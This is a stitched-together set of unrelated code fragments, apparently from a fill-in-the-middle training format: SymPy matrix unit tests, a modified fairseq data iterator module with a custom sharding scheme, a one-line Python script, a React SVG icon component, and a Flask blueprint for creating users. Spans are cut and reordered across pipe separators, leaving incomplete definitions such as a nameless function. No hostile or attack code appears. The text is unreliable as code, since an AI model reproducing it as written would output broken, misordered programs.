assert type(SpecialOnlyMatrix.eye(2, cls=Matrix)) == Matrix
def test_ones():
assert list(SpecialOnlyMatrix.ones(2,2)) == [1, 1, 1, 1]
assert list(SpecialOnlyMatrix.ones(2)) == [1, 1, 1, 1]
assert SpecialOnlyMatrix.ones(2,3) == Matrix([[1, 1, 1], [1, 1, 1]])
assert type(SpecialOnlyMatrix.ones(2)) == SpecialOnlyMatrix
assert type(SpecialOnlyMatrix.ones(2, cls=Matrix)) == Matrix
def test_zeros():
assert list(SpecialOnlyMatrix.zeros(2,2)) == [0, 0, 0, 0]
assert list(SpecialOnlyMatrix.zeros(2)) == [0, 0, 0, 0]
assert SpecialOnlyMatrix.zeros(2,3) == Matrix([[0, 0, 0], [0, 0, 0]])
assert type(SpecialOnlyMatrix.zeros(2)) == SpecialOnlyMatrix
assert type(SpecialOnlyMatrix.zeros(2, cls=Matrix)) == Matrix
def test_diag_make():
diag = SpecialOnlyMatrix.diag
a = Matrix([[1, 2], [2, 3]])
b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
assert diag(a, b, b) == Matrix([
[1, 2, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0],
[0, 0, 3, x, 0, 0],
[0, 0, y, 3, 0, 0],
[0, 0, 0, 0, 3, x],
[0, 0, 0, 0, y, 3],
])
assert diag(a, b, c) == Matrix([
[1, 2, 0, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0, 0],
[0, 0, 3, x, 0, 0, 0],
[0, 0, y, 3, 0, 0, 0],
[0, 0, 0, 0, 3, x, 3],
[0, 0, 0, 0, y, 3, z],
[0, 0, 0, 0, x, y, z],
])
assert diag(a, c, b) == Matrix([
[1, 2, 0, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0, 0],
[0, 0, 3, x, 3, 0, 0],
[0, 0, y, 3, z, 0, 0],
[0, 0, x, y, z, 0, 0],
[0, 0, 0, 0, 0, 3, x],
[0, 0, 0, 0, 0, y, 3],
])
a = Matrix([x, y, z])
b = Matrix([[1, 2], [3, 4]])
c = Matrix([[5, 6]])
# this "wandering diagonal" is what makes this
# a block diagonal where each block is independent
# of the others
assert diag(a, 7, b, c) == Matrix([
[x, 0, 0, 0, 0, 0],
[y, 0, 0, 0, 0, 0],
[z, 0, 0, 0, 0, 0],
[0, 7, 0, 0, 0, 0],
[0, 0, 1, 2, 0, 0],
[0, 0, 3, 4, 0, 0],
[0, 0, 0, 0, 5, 6]])
raises(ValueError, lambda: diag(a, 7, b, c, rows=5))
assert diag(1) == Matrix([[1]])
assert diag(1, rows=2) == Matrix([[1, 0], [0, 0]])
assert diag(1, cols=2) == Matrix([[1, 0], [0, 0]])
assert diag(1, rows=3, cols=2) == Matrix([[1, 0], [0, 0], [0, 0]])
assert diag(*[2, 3]) == Matrix([
[2, 0],
[0, 3]])
assert diag(Matrix([2, 3])) == Matrix([
[2],
[3]])
assert diag([1, [2, 3], 4], unpack=False) == \
diag([[1], [2, 3], [4]], unpack=False) == Matrix([
[1, 0],
[2, 3],
[4, 0]])
assert type(diag(1)) == SpecialOnlyMatrix
assert type(diag(1, cls=Matrix)) == Matrix
assert Matrix.diag([1, 2, 3]) == Matrix.diag(1, 2, 3)
assert Matrix.diag([1, 2, 3], unpack=False).shape == (3, 1)
assert Matrix.diag([[1, 2, 3]]).shape == (3, 1)
assert Matrix.diag([[1, 2, 3]], unpack=False).shape == (1, 3)
assert Matrix.diag([[[1, 2, 3]]]).shape == (1, 3)
# kerning can be used to move the starting point
assert Matrix.diag(ones(0, 2), 1, 2) == Matrix([
[0, 0, 1, 0],
[0, 0, 0, 2]])
assert Matrix.diag(ones(2, 0), 1, 2) == Matrix([
[0, 0],
[0, 0],
[1, 0],
[0, 2]])
def test_diagonal():
m = Matrix(3, 3, range(9))
d = m.diagonal()
assert d == m.diagonal(0)
assert tuple(d) == (0, 4, 8)
assert tuple(m.diagonal(1)) == (1, 5)
assert tuple(m.diagonal(-1)) == (3, 7)
assert tuple(m.diagonal(2)) == (2,)
assert type(m.diagonal()) == type(m)
s = SparseMatrix(3, 3, {(1, 1): 1})
assert type(s.diagonal()) == type(s)
assert type(m) != type(s)
raises(ValueError, lambda: m.diagonal(3))
raises(ValueError, lambda: m.diagonal(-3))
raises(ValueError, lambda: m.diagonal(pi))
def test_jordan_block():
assert SpecialOnlyMatrix.jordan_block(3, 2) == SpecialOnlyMatrix.jordan_block(3, eigenvalue=2) \
== SpecialOnlyMatrix.jordan_block(size=3, eigenvalue=2) \
== SpecialOnlyMatrix.jordan_block(3, 2, band='upper') \
== SpecialOnlyMatrix.jordan_block(
size=3, eigenval=2, eigenvalue=2) \
== Matrix([
[2, 1, 0],
[0, 2, 1],
[0, 0, 2]])
assert SpecialOnlyMatrix.jordan_block(3, 2, band='lower') == Matrix([
[2, 0, 0],
[1, 2, 0],
[0, 1, 2]])
# missing eigenvalue
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(2))
# non-integral size
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(3.5, 2))
# size not specified
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(eigenvalue=2))
# inconsistent eigenvalue
raises(ValueError,
lambda: SpecialOnlyMatrix.jordan_block(
eigenvalue=2, eigenval=4))
# Deprecated feature
raises(SymPyDeprecationWarning,
lambda: SpecialOnlyMatrix.jordan_block(cols=3, eigenvalue=2))
raises(SymPyDeprecationWarning,
lambda: SpecialOnlyMatrix.jordan_block(rows=3, eigenvalue=2))
with warns_deprecated_sympy():
assert SpecialOnlyMatrix.jordan_block(3, 2) == \
SpecialOnlyMatrix.jordan_block(cols=3, eigenvalue=2) == \
SpecialOnlyMatrix.jordan_block(rows=3, eigenvalue=2)
with warns_deprecated_sympy():
assert SpecialOnlyMatrix.jordan_block(
rows=4, cols=3, eigenvalue=2) == \
Matrix([
[2, 1, 0],
[0, 2, 1],
[0, 0, 2],
[0, 0, 0]])
# Using alias keyword
assert SpecialOnlyMatrix.jordan_block(size=3, eigenvalue=2) == \
SpecialOnlyMatrix.jordan_block(size=3, eigenval=2)
# SubspaceOnlyMatrix tests
def test_columnspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.columnspace()
assert basis[0] == Matrix([1, -2, 0, 3])
assert basis[1] == Matrix([2, -5, -3, 6])
assert basis[2] == Matrix([2, -1, 4, -7])
assert len(basis) == 3
assert Matrix.hstack(m, *basis).columnspace() == basis
def test_rowspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.rowspace()
assert basis[0] == Matrix([[1, 2, 0, 2, 5]])
assert basis[1] == Matrix([[0, -1, 1, 3, 2]])
assert basis[2] == Matrix([[0, 0, 0, 5, 5]])
assert len(basis) == 3
def test_nullspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.nullspace()
assert basis[0] == Matrix([-2, 1, 1, 0, 0])
assert basis[1] == Matrix([-1, -1, 0, -1, 1])
# make sure the null space is really gets zeroed
assert all(e.is_zero for e in m*basis[0])
assert all(e.is_zero for e in m*basis[1])
def test_orthogonalize():
m = Matrix([[1, 2], [3, 4]])
assert m.orthogonalize(Matrix([[2], [1]])) == [Matrix([[2], [1]])]
assert m.orthogonalize(Matrix([[2], [1]]), normalize=True) == [Matrix([[2*sqrt(5)/5], [sqrt(5)/5]])]
assert m.orthogonalize(Matrix([[1], [2]]), Matrix([[-1], [4]])) == [Matrix([[1], [2]]), Matrix([[-S(12)/5], [S(6)/5]])]
assert m.orthogonalize(Matrix([[0], [0]]), Matrix([[-1], [4]])) == [Matrix([[-1], [4]])]
assert m.orthogonalize(Matrix([[0], [0]])) == []
n = Matrix([[9, 1, 9], [3, 6, 10], [8, 5, 2]])
vecs = [Matrix([[-5], [1]]), Matrix([[-5], [2]]), Matrix([[-5], [-2]])]
assert n.orthogonalize(*vecs) == [Matrix([[-5], [1]]), Matrix([[S(5)/26], [S(25)/26]])]
# EigenOnlyMatrix tests
def test_eigenvals():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
assert M.eigenvals() == {2*S.One: 1, -S.One: 1, S.Zero: 1}
# if we cannot factor the char poly, we raise an error
m = Matrix([
[3, 0, 0, 0, -3],
[0, -3, -3, 0, 3],
[0, 3, 0, 3, 0],
[0, 0, 3, 0, 3],
[3, 0, 0, 3, 0]])
raises(MatrixError, lambda: m.eigenvals())
def test_eigenvects():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
vecs = M.eigenvects()
for val, mult, vec_list in vecs:
assert len(vec_list) == 1
assert M*vec_list[0] == val*vec_list[0]
def test_left_eigenvects():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
vecs = M.left_eigenvects()
for val, mult, vec_list in vecs:
assert len(vec_list) == 1
assert vec_list[0]*M == val*vec_list[0]
def test_diagonalize():
m = EigenOnlyMatrix(2, 2, [0, -1, 1, 0])
raises(MatrixError, lambda: m.diagonalize(reals_only=True))
P, D = m.diagonalize()
assert D.is_diagonal()
assert D == Matrix([
[-I, 0],
[ 0, I]])
# make sure we use floats out if floats are passed in
m = EigenOnlyMatrix(2, 2, [0, .5, .5, 0])
P, D = m.diagonalize()
assert all(isinstance(e, Float) for e in D.values())
assert all(isinstance(e, Float) for e in P.values())
_, D2 = m.diagonalize(reals_only=True)
assert D == D2
def test_is_diagonalizable():
a, b, c = symbols('a b c')
m = EigenOnlyMatrix(2, 2, [a, c, c, b])
assert m.is_symmetric()
assert m.is_diagonalizable()
assert not EigenOnlyMatrix(2, 2, [1, 1, 0, 1]).is_diagonalizable()
m = EigenOnlyMatrix(2, 2, [0, -1, 1, 0])
assert m.is_diagonalizable()
assert not m.is_diagonalizable(reals_only=True)
def test_jordan_form():
m = Matrix(3, 2, [-3, 1, -3, 20, 3, 10])
raises(NonSquareMatrixError, lambda: m.jordan_form())
# the next two tests test the cases where the old
# algorithm failed due to the fact that the block structure can
# *NOT* be determined from algebraic and geometric multiplicity alone
# This can be seen most easily when one lets compute the J.c.f. of a matrix that
# is in J.c.f already.
m = EigenOnlyMatrix(4, 4, [2, 1, 0, 0,
0, 2, 1, 0,
0, 0, 2, 0,
0, 0, 0, 2
])
P, J = m.jordan_form()
assert m == J
m = EigenOnlyMatrix(4, 4, [2, 1, 0, 0,
0, 2, 0, 0,
0, 0, 2, 1,
0, 0, 0, 2
])
P, J = m.jordan_form()
assert m == J
A = Matrix([[ 2, 4, 1, 0],
[-4, 2, 0, 1],
[ 0, 0, 2, 4],
[ 0, 0, -4, 2]])
P, J = A.jordan_form()
assert simplify(P*J*P.inv()) == A
assert EigenOnlyMatrix(1,1,[1]).jordan_form() == (Matrix([1]), Matrix([1]))
assert EigenOnlyMatrix(1,1,[1]).jordan_form(calc_transform=False) == Matrix([1])
# make sure if we cannot factor the characteristic polynomial, we raise an error
m = Matrix([[3, 0, 0, 0, -3], [0, -3, -3, 0, 3], [0, 3, 0, 3, 0], [0, 0, 3, 0, 3], [3, 0, 0, 3, 0]])
raises(MatrixError, lambda: m.jordan_form())
# make sure that if the input has floats, the output does too
m = Matrix([
[ 0.6875, 0.125 + 0.1875*sqrt(3)],
[0.125 + 0.1875*sqrt(3), 0.3125]])
P, J = m.jordan_form()
assert all(isinstance(x, Float) or x == 0 for x in P)
assert all(isinstance(x, Float) or x == 0 for x in J)
def test_singular_values():
x = Symbol('x', real=True)
A = EigenOnlyMatrix([[0, 1*I], [2, 0]])
# if singular values can be sorted, they should be in decreasing order
assert A.singular_values() == [2, 1]
A = eye(3)
A[1, 1] = x
A[2, 2] = 5
vals = A.singular_values()
# since Abs(x) cannot be sorted, test set equality
assert set(vals) == set([5, 1, Abs(x)])
A = EigenOnlyMatrix([[sin(x), cos(x)], [-cos(x), sin(x)]])
vals = [sv.trigsimp() for sv in A.singular_values()]
assert vals == [S(1), S(1)]
A = EigenOnlyMatrix([
[2, 4],
[1, 3],
[0, 0],
[0, 0]
])
assert A.singular_values() == \
[sqrt(sqrt(221) + 15), sqrt(15 - sqrt(221))]
assert A.T.singular_values() == \
[sqrt(sqrt(221) + 15), sqrt(15 - sqrt(221)), 0, 0]
# CalculusOnlyMatrix tests
@XFAIL
def test_diff():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [x, y])
# TODO: currently not working as ``_MinimalMatrix`` cannot be sympified:
assert m.diff(x) == Matrix(2, 1, [1, 0])
def test_integrate():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [x, y])
assert m.integrate(x) == Matrix(2, 1, [x**2/2, y*x])
def test_jacobian2():
rho, phi = symbols("rho,phi")
X = CalculusOnlyMatrix(3, 1, [rho*cos(phi), rho*sin(phi), rho**2])
Y = CalculusOnlyMatrix(2, 1, [rho, phi])
J = Matrix([
[cos(phi), -rho*sin(phi)],
[sin(phi), rho*cos(phi)],
[ 2*rho, 0],
])
assert X.jacobian(Y) == J
m = CalculusOnlyMatrix(2, 2, [1, 2, 3, 4])
m2 = CalculusOnlyMatrix(4, 1, [1, 2, 3, 4])
raises(TypeError, lambda: m.jacobian(Matrix([1,2])))
raises(TypeError, lambda: m2.jacobian(m))
def test_limit():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [1/x, y])
assert m.limit(x, 5) == Matrix(2, 1, [S(1)/5, y])
def test_issue_13774():
M = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
v = [1,1,1]
raises(TypeError, lambda: M*v)
raises(TypeError, lambda: v*M)
def test___eq__():
assert (EigenOnlyMatrix(
[[0, 1, 1],
[1, 0, 0],
[1, 1, 1]]) == {}) is False | b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
assert a.get_diag_blocks() == [a]
assert b.get_diag_blocks() == [b] |
iterators.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import logging
import math
import operator
import os
import queue
import time
from threading import Thread
import numpy as np
import torch
from fairseq.data import data_utils
logger = logging.getLogger(__name__)
# Object used by _background_consumer to signal the source is exhausted
# to the main thread.
_sentinel = object()
class CountingIterator(object):
"""Wrapper around an iterable that maintains the iteration count.
Args:
iterable (iterable): iterable to wrap
start (int): starting iteration count. Note that this doesn't
actually advance the iterator.
total (int): override the iterator length returned by
``__len__``. This can be used to truncate *iterator*.
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, start=None, total=None):
self.iterable = iterable
self.itr = iter(self)
if start is None:
self.n = getattr(iterable, 'n', 0)
else:
self.n = start
if total is None:
self.total = self.n + len(iterable)
else:
self.total = total
def __len__(self):
return self.total
def __iter__(self):
for x in self.iterable:
if self.n >= self.total:
raise RuntimeError(
'Mismatch between actual and expected iterable length. '
'Please report this to the fairseq developers.'
)
self.n += 1
yield x
def __next__(self):
return next(self.itr)
def has_next(self):
"""Whether the iterator has been exhausted."""
return self.n < len(self)
def skip(self, num_to_skip):
"""Fast-forward the iterator by skipping *num_to_skip* elements."""
next(itertools.islice(self.itr, num_to_skip, num_to_skip), None)
return self
def take(self, n):
"""
Truncates the iterator to n elements at most.
"""
self.total = min(self.total, n)
# Propagate this change to the underlying iterator
# Only take after what we have already consumed (i.e. after restarting
# from checkpoint mid epoch, we have to subtract self.n which is the
# starting point)
#
# This to maintain the invariant self.total = self.n + len(iterable),
# before calling __next__ or __iter__
propagated_take = max(n - self.n, 0)
if hasattr(self.iterable, "take"):
self.iterable.take(propagated_take)
else:
self.iterable = itertools.islice(self.iterable, propagated_take)
class EpochBatchIterating(object):
def __len__(self) -> int:
raise NotImplementedError
@property
def next_epoch_idx(self):
raise NotImplementedError
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
"""Return a new iterator over the dataset.
Args:
shuffle (bool, optional): shuffle batches before returning the
iterator (default: True).
fix_batches_to_gpus: ensure that batches are always
allocated to the same shards across epochs. Requires
that :attr:`dataset` supports prefetching (default: False).
"""
raise NotImplementedError
def end_of_epoch(self) -> bool:
"""Returns whether the most recent epoch iterator has been exhausted"""
raise NotImplementedError
@property
def iterations_in_epoch(self) -> int:
"""The number of consumed batches in the current epoch."""
raise NotImplementedError
def state_dict(self):
"""Returns a dictionary containing a whole state of the iterator."""
raise NotImplementedError
def load_state_dict(self, state_dict):
"""Copies the state of the iterator from the given *state_dict*."""
raise NotImplementedError
class StreamingEpochBatchIterator(EpochBatchIterating):
def __init__(
self, dataset, epoch=1, num_shards=1, shard_id=0,
):
assert isinstance(dataset, torch.utils.data.IterableDataset)
self.dataset = dataset
self.epoch = max(epoch, 1) # we use 1-based indexing for epochs
self._current_epoch_iterator = None
self.num_shards = num_shards
self.shard_id = shard_id
@property
def next_epoch_idx(self):
"""Return the epoch index after *next_epoch_itr* is called."""
if self._current_epoch_iterator is not None and self.end_of_epoch():
return self.epoch + 1
else:
return self.epoch
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
self.epoch = self.next_epoch_idx
self.dataset.set_epoch(self.epoch)
self._current_epoch_iterator = CountingIterator(
iterable=ShardedIterator(
iterable=self.dataset,
num_shards=self.num_shards,
shard_id=self.shard_id,
),
)
return self._current_epoch_iterator
def end_of_epoch(self) -> bool:
return not self._current_epoch_iterator.has_next()
@property
def iterations_in_epoch(self) -> int:
if self._current_epoch_iterator is not None:
return self._current_epoch_iterator.n
return 0
def state_dict(self):
return {
'epoch': self.epoch,
}
def load_state_dict(self, state_dict):
self.epoch = state_dict['epoch']
class EpochBatchIterator(EpochBatchIterating):
"""A multi-epoch iterator over a :class:`torch.utils.data.Dataset`.
Compared to :class:`torch.utils.data.DataLoader`, this iterator:
- can be reused across multiple epochs with the :func:`next_epoch_itr`
method (optionally shuffled between epochs)
- can be serialized/deserialized with the :func:`state_dict` and
:func:`load_state_dict` methods
- supports sharding with the *num_shards* and *shard_id* arguments
Args:
dataset (~torch.utils.data.Dataset): dataset from which to load the data
collate_fn (callable): merges a list of samples to form a mini-batch
batch_sampler (~torch.utils.data.Sampler or a callable): an iterator over batches of
indices, or a callable to create such an iterator (~torch.utils.data.Sampler).
A callable batch_sampler will be called for each epoch to enable per epoch dynamic
batch iterators defined by this callable batch_sampler.
seed (int, optional): seed for random number generator for
reproducibility (default: 1).
num_shards (int, optional): shard the data iterator into N
shards (default: 1).
shard_id (int, optional): which shard of the data iterator to
return (default: 0).
num_workers (int, optional): how many subprocesses to use for data
loading. 0 means the data will be loaded in the main process
(default: 0).
epoch (int, optional): the epoch to start the iterator from
(default: 1).
buffer_size (int, optional): the number of batches to keep ready in the
queue. Helps speeding up dataloading. When buffer_size is zero, the
default torch.utils.data.DataLoader preloading is used.
timeout (int, optional): if positive, the timeout value for collecting a batch
from workers. Should always be non-negative. (default: ``0``)
"""
def __init__(
self, dataset, collate_fn, batch_sampler, seed=1, num_shards=1, shard_id=0,
num_workers=0, epoch=1, buffer_size=0, timeout=0,
):
assert isinstance(dataset, torch.utils.data.Dataset)
self.dataset = dataset
self.collate_fn = collate_fn
self.batch_sampler = batch_sampler
self._frozen_batches = tuple(batch_sampler) if not callable(batch_sampler) else None
self.seed = seed
self.num_shards = num_shards
self.shard_id = shard_id
self.num_workers = num_workers
# This upper limit here is to prevent people from abusing this feature
# in a shared computing environment.
self.buffer_size = min(buffer_size, 20)
self.timeout = timeout
self.epoch = max(epoch, 1) # we use 1-based indexing for epochs
self.shuffle = True
self._cur_epoch_itr = None
self._next_epoch_itr = None
self._supports_prefetch = getattr(dataset, 'supports_prefetch', False)
@property
def frozen_batches(self):
if self._frozen_batches is None:
self._frozen_batches = tuple(self.batch_sampler(self.dataset, self.epoch))
return self._frozen_batches
def __len__(self):
return int(math.ceil(len(self.frozen_batches) / float(self.num_shards)))
@property
def n(self):
return self.iterations_in_epoch
@property
def next_epoch_idx(self):
"""Return the epoch index after *next_epoch_itr* is called."""
if self._next_epoch_itr is not None:
return self.epoch
elif self._cur_epoch_itr is not None and self.end_of_epoch():
return self.epoch + 1
else:
return self.epoch
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
"""Return a new iterator over the dataset.
Args:
shuffle (bool, optional): shuffle batches before returning the
iterator (default: True).
fix_batches_to_gpus: ensure that batches are always
allocated to the same shards across epochs. Requires
that :attr:`dataset` supports prefetching (default: False).
"""
self.epoch = self.next_epoch_idx
self.dataset.set_epoch(self.epoch)
if self._next_epoch_itr is not None:
self._cur_epoch_itr = self._next_epoch_itr
self._next_epoch_itr = None
else:
if callable(self.batch_sampler):
# reset _frozen_batches to refresh the next epoch
self._frozen_batches = None
self._cur_epoch_itr = self._get_iterator_for_epoch(
self.epoch, shuffle, fix_batches_to_gpus=fix_batches_to_gpus,
)
self.shuffle = shuffle
return self._cur_epoch_itr
def end_of_epoch(self) -> bool:
"""Returns whether the most recent epoch iterator has been exhausted"""
return not self._cur_epoch_itr.has_next()
@property
def iterations_in_epoch(self):
"""The number of consumed batches in the current epoch."""
if self._cur_epoch_itr is not None:
return self._cur_epoch_itr.n
elif self._next_epoch_itr is not None:
return self._next_epoch_itr.n
return 0
def state_dict(self):
"""Returns a dictionary containing a whole state of the iterator."""
if self.end_of_epoch():
epoch = self.epoch + 1
iter_in_epoch = 0
else:
epoch = self.epoch
iter_in_epoch = self.iterations_in_epoch
return {
'version': 2,
'epoch': epoch,
'iterations_in_epoch': iter_in_epoch,
'shuffle': self.shuffle,
}
def load_state_dict(self, state_dict):
"""Copies the state of the iterator from the given *state_dict*."""
self.epoch = state_dict['epoch']
itr_pos = state_dict.get('iterations_in_epoch', 0)
version = state_dict.get('version', 1)
if itr_pos > 0:
# fast-forward epoch iterator
self._next_epoch_itr = self._get_iterator_for_epoch(
self.epoch,
shuffle=state_dict.get('shuffle', True),
offset=itr_pos,
)
if self._next_epoch_itr is None:
if version == 1:
# legacy behavior: we finished the epoch, increment epoch counter
self.epoch += 1
else:
raise RuntimeError(
'Cannot resume training due to dataloader mismatch, please '
'report this to the fairseq developers. You can relaunch '
'training with `--reset-dataloader` and it should work.'
)
else:
self._next_epoch_itr = None
def _get_iterator_for_epoch(self, epoch, shuffle, fix_batches_to_gpus=False, offset=0):
def shuffle_batches(batches, seed):
with data_utils.numpy_seed(seed):
np.random.shuffle(batches)
return batches
if self._supports_prefetch:
batches = self.frozen_batches
if shuffle and not fix_batches_to_gpus:
batches = shuffle_batches(list(batches), self.seed + epoch)
batches = list(ShardedIterator(
batches, self.num_shards, self.shard_id, fill_value=[]
))
self.dataset.prefetch([i for s in batches for i in s])
if shuffle and fix_batches_to_gpus:
batches = shuffle_batches(batches, self.seed + epoch + self.shard_id)
else:
if shuffle:
batches = shuffle_batches(list(self.frozen_batches), self.seed + epoch)
else:
batches = self.frozen_batches
batches = list(ShardedIterator(
batches, self.num_shards, self.shard_id, fill_value=[]
))
if offset > 0 and offset >= len(batches):
return None
if self.num_workers > 0:
os.environ['PYTHONWARNINGS'] = 'ignore:semaphore_tracker:UserWarning'
# Create data loader
itr = torch.utils.data.DataLoader(
self.dataset,
collate_fn=self.collate_fn,
batch_sampler=batches[offset:],
num_workers=self.num_workers,
timeout=self.timeout,
)
# Wrap with a BufferedIterator if needed
if self.buffer_size > 0:
itr = BufferedIterator(self.buffer_size, itr)
|
class GroupedIterator(CountingIterator):
"""Wrapper around an iterable that returns groups (chunks) of items.
Args:
iterable (iterable): iterable to wrap
chunk_size (int): size of each chunk
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, chunk_size):
itr = _chunk_iterator(iterable, chunk_size)
super().__init__(
itr,
start=int(math.ceil(getattr(iterable, 'n', 0) / float(chunk_size))),
total=int(math.ceil(len(iterable) / float(chunk_size))),
)
self.chunk_size = chunk_size
def _chunk_iterator(itr, chunk_size):
chunk = []
for x in itr:
chunk.append(x)
if len(chunk) == chunk_size:
yield chunk
chunk = []
if len(chunk) > 0:
yield chunk
class ShardedIterator(CountingIterator):
"""A sharded wrapper around an iterable, padded to length.
Args:
iterable (iterable): iterable to wrap
num_shards (int): number of shards to split the iterable into
shard_id (int): which shard to iterator over
fill_value (Any, optional): padding value when the iterable doesn't
evenly divide *num_shards* (default: None).
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, num_shards, shard_id, fill_value=None):
if shard_id < 0 or shard_id >= num_shards:
raise ValueError('shard_id must be between 0 and num_shards')
sharded_len = int(math.ceil(len(iterable) / float(num_shards)))
batch_size = len(list(iterable)[0])
last = max( list(map(max, *list(iterable))))
# This function receives a list [1,2,3,...., last] where each number represents one of the input subsequences
# In the unmodified fairseq, if you have 4 GPUS, fairseq will give the first GPU subsequences [1,5,9,13,...],
# the second GPU will get [2,6,10,14,..], the third GPU will get [3,7,11,15] and so on...
# If we want to do caching, we can't use that. We need each GPU to get a continuous list of input subsequences (like [1,2,3,4,5,...]).
# So what the following code does, is it splits the input into *continuous* chunks of subsequences. For example, if we have
# 4 GPUs and 100,000 input subsequences, the first GPU will get [1,2,3,...,25000], the second GPU will get [25001,25002,25003,...],
# and so on.
# The above description was written with the assumption that batch_size is 1. This function also works when batch_size is greater than 1.
iterable = range(0, last)
all_itrs = []
for i in range(shard_id*batch_size, (shard_id+1)*batch_size):
itr = list(itertools.islice(iterable, i * sharded_len,
(i +1 )* sharded_len ))
all_itrs.append(itr)
itr = [x for x in itertools.chain(*itertools.zip_longest(*all_itrs)) if x is not None]
itr = [itr[i:i+batch_size] for i in range(0, len(itr), batch_size)] #split to batches
if len(itr) != sharded_len: #this makes sure that we don't miss any input subsequences
to_add = sharded_len - len(itr)
to_add = [[e] for e in range(sharded_len-to_add, sharded_len)]
itr = itr + to_add
super().__init__(
itr,
start=int(math.ceil(getattr(iterable, 'n', 0) / float(num_shards))),
total=sharded_len,
)
class BackgroundConsumer(Thread):
def __init__(self, queue, source, max_len):
Thread.__init__(self)
self._queue = queue
self._source = source
self._max_len = max_len
self.count = 0
def run(self):
try:
for item in self._source:
self._queue.put(item)
# Stop if we reached the maximum length
self.count += 1
if self._max_len is not None and self.count >= self._max_len:
break
# Signal the consumer we are done.
self._queue.put(_sentinel)
except Exception as e:
self._queue.put(e)
class BufferedIterator(object):
def __init__(self, size, iterable):
self._queue = queue.Queue(size)
self._iterable = iterable
self._consumer = None
self.start_time = time.time()
self.warning_time = None
self.total = len(iterable)
def _create_consumer(self):
self._consumer = BackgroundConsumer(
self._queue,
self._iterable,
self.total,
)
self._consumer.daemon = True
self._consumer.start()
def __iter__(self):
return self
def __len__(self):
return self.total
def take(self, n):
self.total = min(self.total, n)
# Propagate this change to the underlying iterator
if hasattr(self._iterable, "take"):
self._iterable.take(n)
else:
self._iterable = itertools.islice(self._iterable, n)
def __next__(self):
# Create consumer if not created yet
if self._consumer is None:
self._create_consumer()
# Notify the user if there is a data loading bottleneck
if self._queue.qsize() < min(2, max(1, self._queue.maxsize // 2)):
if time.time() - self.start_time > 5 * 60:
if self.warning_time is None or time.time() - self.warning_time > 15 * 60:
logger.debug(
"Data loading buffer is empty or nearly empty. This may "
"indicate a data loading bottleneck, and increasing the "
"number of workers (--num-workers) may help."
)
self.warning_time = time.time()
# Get next example
item = self._queue.get(True)
if isinstance(item, Exception):
raise item
if item is _sentinel:
raise StopIteration()
return item | # Wrap with CoutingIterator
itr = CountingIterator(itr, start=offset)
return itr
|
ex1.py | print(callable(abs)) |
||
PersonPinRound.js | function SvgPersonPinRound(props) {
return (
<svg
xmlns='http://www.w3.org/2000/svg'
height='1em'
viewBox='0 0 24 24'
width='1em'
className='svg-icon'
{...props}> | </svg>
);
}
export default SvgPersonPinRound; | <path d='M0 0h24v24H0V0z' fill='none' />
<path d='M19 2H5a2 2 0 00-2 2v14c0 1.1.9 2 2 2h4l2.29 2.29c.39.39 1.02.39 1.41 0L15 20h4c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zm-7 3.3c1.49 0 2.7 1.21 2.7 2.7s-1.21 2.7-2.7 2.7S9.3 9.49 9.3 8s1.21-2.7 2.7-2.7zM18 16H6v-.9c0-2 4-3.1 6-3.1s6 1.1 6 3.1v.9z' /> |
users.py | from http import HTTPStatus
from typing import List
from apifairy import body, other_responses, response
from flask import Blueprint, jsonify
from flask import request
from src.config import DefaultConfig
from src.dtos.user import UserDto
from src.requests.user import CreateUserRequestSchema, CreateUserRequest, CreateManyUsersRequestSchema, \
CreateManyUsersRequest
from src.responses.user import UserResponseSchema
from src.services import queue_client
from src.services.pascal_to_snake_serializer import JSONSerializer as ToSnakeJson
from src.services.snake_to_pascal_serializer import JSONSerializer as ToPascalJson
users_api = Blueprint('users', __name__)
@users_api.route('users', methods=['POST'])
@other_responses({
200: 'User Created',
400: 'Request Body is Invalid'
})
@body(CreateUserRequestSchema())
def post(user_request: CreateUserRequest):
"""Create a User."""
if request.method == 'POST':
user_snake_case = ToSnakeJson.deserialize(UserDto, ToSnakeJson.serialize(user_request))
add_msg = queue_client.add_create_user_job(user_snake_case)
return jsonify(add_msg), 200
@users_api.route('users/many', methods=['POST'])
@other_responses({
200: 'Users Created',
400: 'Request Body is Invalid'
})
@body(CreateManyUsersRequestSchema())
def | (user_request: CreateManyUsersRequest):
"""Create a User."""
if request.method == 'POST':
users_snake_case = ToSnakeJson.deserialize(List[UserDto], ToSnakeJson.serialize(user_request.Users))
users_added = []
